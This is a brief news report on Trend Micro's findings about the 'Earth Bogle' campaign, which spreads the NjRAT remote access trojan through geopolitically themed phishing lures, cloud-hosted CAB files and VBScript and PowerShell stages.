NjRAT (also known as Bladabindi) has been actively spreading across the Middle East and North Africa, with a campaign exploiting Middle Eastern geopolitical-themed baits to spread the virus. Cybersecurity analysts at Trend Micro uncovered the effort, which has been running since at least the middle of 2022, and gave it the name “Earth Bogle.”
Files[. ]fm and failiem[. ]lv are used by the threat actor as malware hosting services, while compromised web servers are used to disseminate NjRAT, according to a study published by Trend Micro on Wednesday.
Phishing emails, which are often personalized to the recipient, contain harmful attachments that activate the infection procedure. It’s packaged as a CAB file, which is a Microsoft Cabinet archive, and contains a dropper written in Visual Basic Script. It is also possible that the files are spread via social networking sites like Facebook and Discord, with the help of fake profiles that are used to promote fake news sites.
The CAB files, which are stored in the cloud, are disguised as private audio recordings in order to trick victims into opening the archives and running the malicious VBScript, which in turn downloads another another malicious VBScript file disguised as an image.
Step Two The RAT payload is loaded into memory and executed by a PowerShell script, which is retrieved through VBScript from a compromised domain.
Since its discovery in 2013, NjRAT (also known as Bladabindi) has been used by threat actors to steal confidential data and take over infected machines.
The researchers drew the conclusion that “this scenario illustrates that threat actors would exploit public cloud storage as malware file servers, paired with social engineering approaches appealing to people’s passions, such as regional geopolitical themes as lures.”